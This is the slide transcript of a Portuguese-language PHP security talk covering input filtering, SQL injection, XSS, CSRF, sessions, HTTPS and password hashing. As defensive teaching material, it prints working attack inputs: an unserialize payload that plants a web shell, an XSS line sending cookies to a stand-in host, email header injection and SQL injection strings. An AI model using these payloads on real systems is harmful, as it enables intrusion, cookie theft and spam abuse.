Upgrade to Pro — share decks privately, control downloads, hide ads and more …

PHP & Segurança: Blindando Aplicações Web

Rafa Jaques
March 28, 2017
Programming
4
840

PHP & Segurança: Blindando Aplicações Web

O objetivo dessa palestra é apresentar algumas vulnerabilidades que são bastante comuns em aplicações PHP e qual a maneira de contorná-las. Serão mostradas técnicas de programação defensiva, resposta a incidentes, prevenção de perdas e outros tópicos relevantes à segurança da informação. Princípios de segurança, técnicas de invasão e defesa, identificação e prevenção de ataques, boas práticas e proteção do usuário fazem parte dos assuntos abordados nessa palestra.

Rafa Jaques

March 28, 2017
Tweet

More Decks by Rafa Jaques

See All by Rafa Jaques
Electron: Construindo Aplicações Desktop Multi-Plataforma com HTML, CSS e JS
rafajaques
1
820
PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva - Rafael Jaques [FISL 16]
rafajaques
0
160
PHP na Tela Escura: Aplicações Poderosas em Linha de Comando - Rafael Jaques [FISL 15]
rafajaques
0
230
Segurança na Era Digital: ensinando novos hábitos aos indivíduos digitais - Rafael Jaques [FISL 14]
rafajaques
0
65
Engenharia Social: A Doce Arte de Hackear Mentes - Rafael Jaques [FISL 13]
rafajaques
0
1.4k
PHP Sob Ataque - Técnicas de Programação Defensiva - Rafael Jaques [FISL 12]
rafajaques
0
130

Other Decks in Programming

See All in Programming
Tailwind CSSを本気でカスタマイズする方法
fsubal
13
5.3k
効率化に挑戦してみたらモバイル開発が少し快適になった話
ryunakayama
0
130
初心者のためのRubyKaigi入門/RubyKaigi Introduction
a_matsuda
2
820
GraphQLサーバの構成要素を整理する #ハッカー鮨 #tsukijigraphql / graphql server technology selection
izumin5210
4
840
⼤規模⾔語モデルの拡張(RAG)が 終わったかも知れない件について
nearme_tech
23
15k
Goのエラースタックトレースの歴史と今後
sonatard
9
1.5k
educure_カリキュラム生操作マニュアル.pdf
linew_official
0
810
GitHub Copilotのススメ
marcy731
1
200
if constexpr文はテンプレート世界のラムダ式である
faithandbrave
3
650
Elm Form Validation
bkuhlmann
0
510
Node.js v22 で変わること
yosuke_furukawa
PRO
9
3.5k
Git Lint
bkuhlmann
4
750

Featured

See All Featured
Gamification - CAS2011
davidbonilla
76
4.6k
Unsuck your backbone
ammeep
663
57k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
6
1.5k
Designing on Purpose - Digital PM Summit 2013
jponch
110
6.5k
Fantastic passwords and where to find them - at NoRuKo
philnash
37
2.5k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
2
3.4k
Designing for Performance
lara
601
67k
Side Projects
sachag
451
41k
Navigating Team Friction
lara
178
13k
Designing for humans not robots
tammielis
248
25k
Atom: Resistance is Futile
akmur
259
25k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
30
6k

Transcript

  1. PHP & Segurança Blindando Aplicações Web Rafael Jaques @rafajaques iMasters

    - PHP Experience 2017

  2. “Conhecereis a verdade e a verdade vos libertará.” João 8:32

  3. Rafael Jaques Professor do Instituto Federal de Educação, Ciência e

    Tecnologia do Rio Grande do Sul. Graduado em Análise e Desenvolvimento de Sistemas. Pós- graduado em Gestão e Docência do Ensino Superior. Mestre em Educação. Desenvolvedor web e viciado em segurança.

  4. www.php-rs.org

  5. Um detalhe… Não tem como falar de tudo :( Mas

    eu tentei…

  6. 1 Segurança da informação

  7. Pontos-chave da SI Integridade Confidencialidade Disponibilidade

  8. 2 Planejamento

  9. Planejamento Projete o seu sistema Estude antes de implementar Revise

    o que foi feito Conheça o seu ambiente

  10. Problemas no servidor Defesa em profundidade

  11. Problemas no servidor Lei do menor privilégio

  12. 3 Melhorando o código desenvolvido

  13. Como desenvolver um bom código?

  14. Tudo começa com BOAS PRÁTICAS

  15. Warning: Cannot modify header information - headers already sent by

    (output started at / path/to/script.php:1) in script.php on line 55 Omita as tags de fechamento Boas práticas

  16. Utilize extensões consistentes Boas práticas .php .inc.php .inc .php~ .bak

  17. Utilize extensões consistentes Boas práticas .php .inc.php .inc .php~ .bak

    httpd.conf AddType application/x-httpd-php .php .phtml

  18. Nunca edite arquivos em produção Boas práticas

  19. Funções perigosas exec( ) Não execute bobagem no seu sistema

    shell_exec( ) system( ) passthru( ) proc_*( )

  20. Funções perigosas exec( ) Não execute bobagem no seu sistema

    shell_exec( ) system( ) passthru( ) proc_*( ) escapeshellcmd( ) escapeshellarg( )

  21. Funções perigosas serialize() unserialize( )

  22. Ex.: https://speakerdeck.com/willdonohoe/practical-php-security class Logger { public $logFile; public $buffer; public

    $fh; public function __destruct() { $this->WriteBuffer(); } public function WriteBuffer() { if (!$this->fh) { $this->fh = fopen($this->logFile, 'w'); } fwrite($this->fh, $this->buffer); } // ... } // ... $cookieData = unserialize($_COOKIE['data']); // ...

  23. O:6:"Logger":3:{s:7:"logFile";s: 8:"vish.php";s:6:"buffer";s:27:"<?php system($_GET["mal"]);";s:2:"fh";N;} Ex.: https://speakerdeck.com/willdonohoe/practical-php-security Grava o arquivo vish.php com

    o conteúdo: <?php system($_GET["mal"]);

  24. Ex.: https://speakerdeck.com/willdonohoe/practical-php-security Primeiro resultado ao procurar no Google por php

    store array cookie

  25. Seu ambiente também precisa de cuidado e atenção

  26. Configuração do ambiente Headers Podem denunciar o seu servidor expose_php

    php.ini

  27. Apache ServerTokens Prod Major Minor Min Os Full Configuração do

    ambiente

  28. $ lwp-request -edm GET sitedealguem.com.br 200 OK [...] Connection: close

    Pragma: no-cache Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Type: text/html X-Meta-Revisit-After: 4 days X-Powered-By: PHP/5.3.3-7+squeeze2

  29. $ lwp-request -edm GET sitedealguem.com.br 200 OK [...] Connection: close

    Pragma: no-cache Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Type: text/html X-Meta-Revisit-After: 4 days X-Powered-By: PHP/5.3.3
  30. None

  31. Gerenciar os erros pode salvar seu dia!

  32. Gerenciamento de erros display_errors error_reporting log_errors error_log Mostrar erros na

    tela Nível de erro mostrado Logar erros Arquivo de log

  33. set_error_handler( ) error_log( ) Indica uma função para manipular erros

    Loga um erro personalizado Gerenciamento de erros

  34. 4 Filtragem de dados

  35. Filtragem de dados Bypass Mistake Origin

  36. Validate Sanitize filter_var( ) Validating && Sanitizing Bloqueie valores indesejados

    Filtragem de dados

  37. filter_var( ) php.net/filter.filters FILTER_VALIDATE_* FILTER_SANITIZE_* Validação de dados Verifica se

    determinado valor encontra-se dentro dos parâmetros esperados. Limpeza de dados Retira de um determinado valor todos os caracteres que não são permitidos.

  38. Validação filter_var( , ) $valor CONSTANTE_FILTRO Valor filtrado bool(false)

  39. Validação FILTER_VALIDATE_EMAIL “[email protected]" string(12) “[email protected]” “[email protected]" bool(false) 5 bool(false) “1@2”

    bool(false) “phpit.com.br” bool(false) “joao quem”@site.com bool(false)

  40. Validação FILTER_VALIDATE_FLOAT php.net/filter.filters.validate FILTER_VALIDATE_BOOLEAN FILTER_VALIDATE_IP FILTER_VALIDATE_URL

  41. Limpeza FILTER_SANITIZE_URL http://phpit.com.br http://phpit.com.br£ phpitº.com.br br¶ § string(19) "http://phpit.com.br" string(19)

    "http://phpit.com.br" string(12) "phpit.com.br" string(2) "br" string(0) ""

  42. FILTER_SANITIZE_STRING uma string string(10) "uma string" string(12) "uma string *"

    string(21) "uma string&lt;tag&gt;" Limpeza <tag>uma string * <tag>uma string&lt;tag&gt;

  43. Limpeza FILTER_SANITIZE_EMAIL php.net/filter.filters.validate FILTER_SANITIZE_SPECIAL_CHARS FILTER_SANITIZE_ENCODED FILTER_SANITIZE_NUMBER_INT

  44. Cuidados com Formulários

  45. Spoofed Form Submissions Cuidados com formulários

  46. Abuso de form mail Cuidados com formulários

  47. Abuso de form mail <?php $cabecalhos = "From: {$_POST['nome']} <{$_POST['email']}>";

    $para = "[email protected]"; $assunto = "Contato via site"; $corpo = $_POST['mensagem']; mail($para, $assunto, $corpo, $cabecalhos);

  48. Abuso de form mail From: Fulaninho <[email protected]> To: [email protected] Subject:

    Contato via site Esta é a mensagem do e-mail Esperado

  49. Abuso de form mail From: Fulaninho <[email protected]> To: [email protected] Subject:

    Contato via site Esta é a mensagem do e-mail Esperado Fulaninho\nBcc:[email protected],[email protected],

  50. Abuso de form mail From: Fulaninho Bcc: [email protected], [email protected], <[email protected]>

    To: [email protected] Subject: Contato via site Aqui coloco uma mensagem de SPAM sobre viagra ou algo assim! Possível

  51. 5 Upload de arquivos

  52. MIME Type do $_FILES Upload de arquivos

  53. Verificar o tipo da imagem exif_imagetype( ) Upload de arquivos

  54. php.net/function.exif-imagetype Upload de arquivos

  55. Ressalvar imagens Upload de arquivos

  56. 6 Injeção de código

  57. XSS Cross-Site Scripting

  58. XSS Cross-Site Scripting <script> document.location = "http://sitedomal.com?c=" + document.cookie </script>

  59. XSS Cross-Site Scripting Filtrar dados externos Utilize as funções de

    filtro Utilize uma white-list

  60. htmlentities( ) strip_tags( ) XSS Cross-Site Scripting Utilize as funções

    de filtro utf8_decode( ) filter_var( )

  61. XSS Cross-Site Scripting Cuidado com injeção de CSS expression( )

    url( ) Métodos
 específicos moz- binding

  62. CSRF Cross-Site Request Forgery

  63. CSRF Cross-Site Request Forgery http://meusite.com/voto.php?id=1 <img src="http://meusite.com/voto.php?id=1" />

  64. CSRF Cross-Site Request Forgery Exigir um token Solicitar reautenticação Prefira

    POST em vez de GET Limite o tempo de sessão Verificar Referer Force o uso de seus formulários uniqid( ) $_SERVER['HTTP_REFERER']

  65. Outros tipos de injeção XPath LDAP Bibliotecas de terceiros Upload

    de arquivos

  66. Indo além da Validação de dados

  67. Além da validação Regras de negócio Filtrou a entrada? Filtre

    a saída! Não confie nos cookies!

  68. 7 Segurança em bancos de dados

  69. SGBDs suportados pelo PHP php.net/refs.database dBase DB++ CUBRID FrontBase FireBird/Interbase

    filePro Ingres Informix IBM DB2 mSQL Mongo MaxDB Oracle MySQL M$ SQL PostgreSQL Paradox Ovrimos SQL Tokyo Tyrant Sybase SQLite

  70. Conceitos básicos de segurança em Bancos de Dados

  71. Lei do Menor Privilégio

  72. Não permita Acesso Remoto

  73. Prefira utilizar UTF-8

  74. Escapar caracteres não é seguro mysql_real_escape_string( ) addslashes( )

  75. SQL e Blind SQL Injection

  76. SQL Injection

  77. SQL Injection Injeção de código SQL arbitrário dentro de uma

    consulta legítima.

  78. SQL Injection

  79. SQL Injection 1' OR 1='1

  80. SQL Injection fulano'# ou fulano' --

  81. extension:php mysql_query $_GET

  82. SQL Injection Blind

  83. Injeção de código arbitrário sem visualização da saída do banco.

    Blind SQL Injection

  84. Prepared Statements e ORMs

  85. Prepared Statements Declarações preparadas Compila as consultas SQL Utiliza placeholders

  86. Declarações preparadas INSERT INTO produtos (nome, preco) VALUES (?, ?)

    Prepared Statements

  87. ORM Object-relational mapping Reduz a escrita de SQL Acesso ao

    banco através de classes

  88. ORMs

  89. Exposição de credenciais

  90. O que acontece se alguém tiver acesso aos seus arquivos?

  91. E se o PHP parar de funcionar?

  92. None

  93. 8 Cookies e sessions

  94. Cookies são client-side Sessions são server-side Cookies e Sessions

  95. Cliente Servidor Requisição HTTP Resposta HTTP + Set Cookie Requisição

    HTTP Resposta HTTP Cookies e Sessions

  96. Servidor session_start() Verifica se a sessão existe Procura pelo SESSID

    em um cookie Procura pelo SESSID numa querystring Busca os dados e cria a $_SESSION Sim Sim Não Cria uma nova SESSID Não Cookies e Sessions

  97. Roubo de Cookie (Cookie Theft)

  98. Tome cuidado com XSS

  99. Cookies também podem ser roubados com sniffers Proteja utilizando HTTPS

  100. Vulnerabilidades de Sessão

  101. Dados de sessão podem ser visualizados via sniff quando não

    criptografado com HTTPS Exposição de Sessão

  102. Hospedagens compartilhadas podem vazar dados dentro dos diretórios com permissões

    de leitura a todos Utilize session_set_save_handler() para alterar o comportamento de gravação dos dados de sessão Exposição de Sessão

  103. Roubo de Sessão (Session Hijacking)

  104. É possível fixar um SID, forjar ou até mesmo capturar

    um cookie! Roubo de Sessão

  105. Algumas sugestões para evitar roubo de sessão (tente equilibrar usabilidade

    e segurança): Gerar tokens únicos por usuário Verificar User-Agent e IP Utilizar sessões apenas via cookies Roubo de Sessão

  106. Não sacrifique a usabilidade do projeto!

  107. None

  108. não

  109. 2FA, 3FA, 4FA…

  110. 9 Tráfego na web

  111. Fluxo do tráfego Cliente Servidor Requisição HTTP Resposta HTTP Requisição

    HTTP Resposta HTTP

  112. Sniffers em redes abertas

  113. Wireshark

  114. None

  115. Configurando um certificado SSL

  116. http://www.phpit.com.br/artigos/configurando-ssl- servidor-de-desenvolvimento-apache.phpit Gerando um certificado para testes

  117. None

  118. Alternando entre HTTP e HTTPS

  119. Leves diferenças na $_SERVER sob HTTPS

  120. $_SERVER [HTTP_HOST] => localhost [SERVER_SOFTWARE] => Apache/2.2.22 [SERVER_NAME] => localhost

    [SERVER_ADDR] => 127.0.0.1 [SERVER_PORT] => 80 [REMOTE_ADDR] => 127.0.0.1 [DOCUMENT_ROOT] => /var/www HTTP [HTTPS] => on [SSL_TLS_SNI] => localhost [HTTP_HOST] => localhost [SERVER_SOFTWARE] => Apache/2.2.22 [SERVER_NAME] => localhost [SERVER_ADDR] => 127.0.0.1 [SERVER_PORT] => 443 [REMOTE_ADDR] => 127.0.0.1 [DOCUMENT_ROOT] => /var/www HTTPS

  121. Force a utilização do protocolo HTTPS Via aplicação ou via

    apache

  122. 10 Armazenando senhas

  123. md5… sha1…

  124. crypt password_hash

  125. <?php $cript = password_hash('abacaxi', CRYPT_BLOWFISH, ['cost' => 12]); // Exemplo:

    $2y$12$0VeJrCeppjPkEkxwuJNRRudT25GAUprLgzUHq5zX01G2LPJyZjixS if (password_verify('abacaxi', $cript)) { echo 'Senha OK'; } else { echo 'Deu ruim!'; }

  126. <?php $senha = 'abacaxi'; $hash = '$2y$12$0VeJrCeppjPkEkxwuJNRRudT25GAUprLgzUHq5zX01G2LPJyZjixS'; // Pode aumentar

    conforme a capacidade do seu servidor evolui $opcoes = ['cost' => 10]; // Verifica se a senha está OK if (password_verify($senha, $hash)) { // Se deu certo, verifica se a senha atende às novas // opções (como algoritmo ou custo diferentes) if (password_needs_rehash($hash, PASSWORD_DEFAULT, $opcoes)) { // Gera uma senha nova para substituir a antiga $novoHash = password_hash($senha, PASSWORD_DEFAULT, $opcoes); } }

  127. É possível definir um salt, mas não é recomendado!

  128. 11 Aplicações de verificação de vulnerabilidades

  129. https://github.com/zaproxy/zaproxy

  130. http://beefproject.com/

  131. https://portswigger.net/burp/

  132. http://www.commixproject.com/

  133. https://github.com/jkingsman/Bishop

  134. http://sqlmap.org/

  135. https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project WebGoat - Aplicação Vulnerável para Estudo

  136. Monitorar logs Manter PHP atualizado Frameworks Segurança física Últimas dicas

  137. Sempre que possível, utilize código refatorado Exposição phpinfo() Cuidados ao

    enviar e-mails Segurança no sistema de arquivos Últimas dicas

  138. Obrigado! Rafael Jaques [email protected] rafajaques.com.br / phpit.com.br @rafajaques speakerdeck.com/rafajaques w

    @

  139. Imagens utilizadas • https://flic.kr/p/5Ndwd8 • https://flic.kr/p/i3NEP6 • Icons made by

    Madebyoliver from www.flaticon.com is licensed by CC 3.0 BY